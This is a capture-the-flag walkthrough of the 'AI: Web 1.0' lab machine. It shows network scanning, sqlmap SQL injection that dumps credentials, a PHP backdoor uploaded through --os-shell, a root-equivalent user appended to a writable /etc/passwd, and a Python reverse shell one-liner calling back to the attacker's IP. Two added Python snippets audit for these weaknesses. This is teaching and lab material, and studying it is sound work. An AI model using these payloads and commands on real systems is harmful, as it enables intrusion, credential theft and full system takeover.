Discovery and ports

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6c:40:99, IPv4: 192.168.2.8
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.2.1 00:50:56:c0:00:08 VMware, Inc.
192.168.2.2 00:50:56:e4:e9:e5 VMware, Inc.
192.168.2.5 00:0c:29:93:fe:b3 VMware, Inc.
192.168.2.254 00:50:56:e6:f5:e8 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 4 responded

┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.2.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 03:18 EDT
Nmap scan report for 192.168.2.5
Host is up (0.00060s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-server-header: Apache
| http-robots.txt: 2 disallowed entries
|_/m3diNf0/ /se3reTdir777/uploads/
|_http-title: AI Web 1.0
MAC Address: 00:0C:29:93:FE:B3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.60 ms 192.168.2.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds

Directories

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.2.5
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/_192.168.2.5/_24-09-05_03-19-22.txt

Target: http://192.168.2.5/

[03:19:22] Starting:
[03:19:23] 403 - 220B - /.ht_wsr.txt
[03:19:23] 403 - 223B - /.htaccess.bak1
[03:19:23] 403 - 223B - /.htaccess.orig
[03:19:23] 403 - 223B - /.htaccess_orig
[03:19:23] 403 - 224B - /.htaccess_extra
[03:19:23] 403 - 225B - /.htaccess.sample
[03:19:23] 403 - 223B - /.htaccess.save
[03:19:23] 403 - 221B - /.htaccessOLD
[03:19:23] 403 - 221B - /.htaccessBAK
[03:19:23] 403 - 222B - /.htaccessOLD2
[03:19:23] 403 - 213B - /.htm
[03:19:23] 403 - 214B - /.html
[03:19:23] 403 - 223B - /.htpasswd_test
[03:19:23] 403 - 220B - /.httr-oauth
[03:19:23] 403 - 219B - /.htpasswds
[03:19:24] 403 - 213B - /.php
[03:19:24] 403 - 221B - /.htaccess_sc
[03:19:40] 200 - 80B - /robots.txt
[03:19:40] 403 - 222B - /server-status
[03:19:40] 403 - 223B - /server-status/

Task Completed

robots.txt

User-agent: *
Disallow:
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/


SQL injection

sqlmap -r req.txt --batch -D aiweb1 -T systemUser -C id,password,userName --dump  


t00r
FakeUserPassw0rd

aiweb1pwn
MyEvilPass_f908sdaf9_sadfasf0sa

u3er
N0tThis0neAls0

dirb finds the info file

┌──(root㉿kali)-[~/yiyi/tmp]
└─# dirb http://192.168.2.5/m3diNf0/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Sep 5 03:52:38 2024
URL_BASE: http://192.168.2.5/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.2.5/m3diNf0/ ----
+ http://192.168.2.5/m3diNf0/info.php (CODE:200|SIZE:84303)

-----------------
END_TIME: Thu Sep 5 03:52:41 2024
DOWNLOADED: 4612 - FOUND: 1


Search the info page for the keyword root to find the site's absolute path

/home/www/html/web1x443290o2sdf92213


disable_functions

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
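
Added example, not part of the original write-up: a small Python audit of the disable_functions value above. The target only disabled pcntl_* functions, so the command-execution backdoor that sqlmap later dropped had system()/exec()-style functions available; the check lists which process-spawning functions a php.ini value leaves enabled and prints a hardened value. The list of process-spawning functions is my assumption, not something the page states, and disable_functions never blocked the stager itself, which MySQL wrote to the uploads directory through the injection.

```python
# Process-spawning PHP functions a web-facing PHP rarely needs. This list is
# an assumption of this example, not something the write-up states.
PROCESS_FUNCTIONS = frozenset({
    "exec", "passthru", "shell_exec", "system", "proc_open", "popen", "pcntl_exec",
})

# The disable_functions value shown on the target's info page, copied from the
# write-up: only pcntl_* is disabled, nothing that blocks system() or exec().
TARGET_DISABLE_FUNCTIONS = (
    "pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,"
    "pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,"
    "pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,"
    "pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,"
    "pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,"
    "pcntl_setpriority,pcntl_async_signals,"
)


def parse_disable_functions(value: str) -> set[str]:
    """Split a php.ini disable_functions value into lower-case names.
    PHP takes a comma-separated list and tolerates whitespace and a trailing
    comma, so the parser does the same."""
    return {name.strip().lower() for name in value.split(",") if name.strip()}


def missing_process_functions(value: str) -> list[str]:
    """Process-spawning functions that `value` leaves enabled, sorted."""
    return sorted(PROCESS_FUNCTIONS - parse_disable_functions(value))


def hardened_disable_functions(value: str) -> str:
    """Return `value` with every missing process-spawning function added."""
    return ",".join(sorted(parse_disable_functions(value) | PROCESS_FUNCTIONS))


if __name__ == "__main__":
    gaps = missing_process_functions(TARGET_DISABLE_FUNCTIONS)
    print("still enabled on the target:", ", ".join(gaps))
    print("hardened value:", hardened_disable_functions(TARGET_DISABLE_FUNCTIONS))
```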

With the site's absolute path known, the upload directory path can be assembled and used to upload a shell

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
┌──(root㉿kali)-[~/yiyi/tmp]
└─# sqlmap -r req.txt --os-shell

___
__H__
___ ___[.]_____ ___ ___ {1.8.6.3#dev}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:01:45 /2024-09-05/

[04:01:45] [INFO] parsing HTTP request from 'req.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]

[04:01:46] [INFO] resuming back-end DBMS 'mysql'
[04:01:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 8795=8795#&Operation=Submit

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(4231=4231,1))),0x71706b7671),4231)-- LvwO&Operation=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 1312 FROM (SELECT(SLEEP(5)))sBBH)-- DdYi&Operation=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a6271,0x455143624b59675148644e666b6d786f66745057795551626e6643544a4f4c58776177534e6e697a,0x71706b7671)#&Operation=Submit
---
[04:01:46] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[04:01:46] [INFO] going to use a web backdoor for command prompt
[04:01:46] [INFO] fingerprinting the back-end DBMS operating system
[04:01:46] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n]

[04:01:51] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
[04:02:05] [WARNING] unable to automatically parse any web server path
[04:02:05] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' via LIMIT 'LINES TERMINATED BY' method
[04:02:05] [INFO] the file stager has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.2.5:80/se3reTdir777/uploads/tmpuzwml.php
[04:02:05] [INFO] the backdoor has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.2.5:80/se3reTdir777/uploads/tmpbcmer.php
[04:02:05] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
[04:02:05] [INFO] the file stager has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.2.5:80/se3reTdir777/uploads/tmpuzwml.php
[04:02:05] [INFO] the backdoor has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.2.5:80/se3reTdir777/uploads/tmpbcmer.php

Note the two uploaded files

One is the file-upload stager, the other is the command-execution backdoor


Privilege escalation

/etc/passwd turns out to be readable and writable by the web user (it is owned by www-data)

os-shell> ls -al /etc/|grep passwd
command standard output:
---
-rw-r--r-- 1 www-data www-data 1664 Aug 21 2019 passwd
-rw-r--r-- 1 www-data www-data 1617 Aug 20 2019 passwd-
---

Add a new user

Generate a password hash for the login

┌──(root㉿kali)-[~]
└─# perl -le 'print crypt("123456","addedsalt")'
adrla7IBSfTZQ

Write it

os-shell> echo "test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
No output
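
Added example, not part of the original write-up: a Python check for the persistence seen in this section, a writable /etc/passwd plus a UID-0 entry whose crypt() hash sits directly in the password field. The sample passwd text is constructed and embeds the exact line appended above so the check runs offline; the audit_passwd_mode helper is also an addition and checks the ownership problem shown in the ls output.

```python
import os
import stat

# Constructed sample: a normal root entry, the web server account, and the
# exact line the write-up appended to the target's /etc/passwd.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash
"""


def audit_passwd_lines(text: str) -> list[str]:
    """Return one finding per suspicious entry in passwd-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append(f"line {lineno}: '{name}' has an empty password field")
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # Anything else is a hash checked straight from passwd, bypassing
            # /etc/shadow; this is what crypt("123456","addedsalt") produced.
            findings.append(f"line {lineno}: '{name}' carries an inline password hash")
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: '{name}' has UID 0 (root-equivalent)")
    return findings


def audit_passwd_mode(path: str = "/etc/passwd") -> list[str]:
    """Flag the file if it is not root-owned or is writable by group/others.
    On the target it was owned by www-data, so the web user could append to it."""
    st = os.stat(path)
    findings = []
    if st.st_uid != 0:
        findings.append(f"{path} is owned by uid {st.st_uid}, not root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path} is group- or world-writable")
    return findings


if __name__ == "__main__":
    print(*audit_passwd_lines(SAMPLE_PASSWD), sep="\n")
```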


Reverse shell

nc is present, but -e is disabled

python is present, so use a python reverse shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.2.8',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"


Switch user

www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ su test
Password: 123456

root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# ls /root
flag.txt
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# cat /root/flag
cat: /root/flag: No such file or directory
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# cat /root/flag.txt
####################################################
# #
# AI: WEB 1.0 #
# #
# Congratulation!!! #
# #
# Thank you for penetrate my system. #
# #
# Hope you enjoyed this. #
# #
# #
# flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71} #
# #
####################################################
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads#
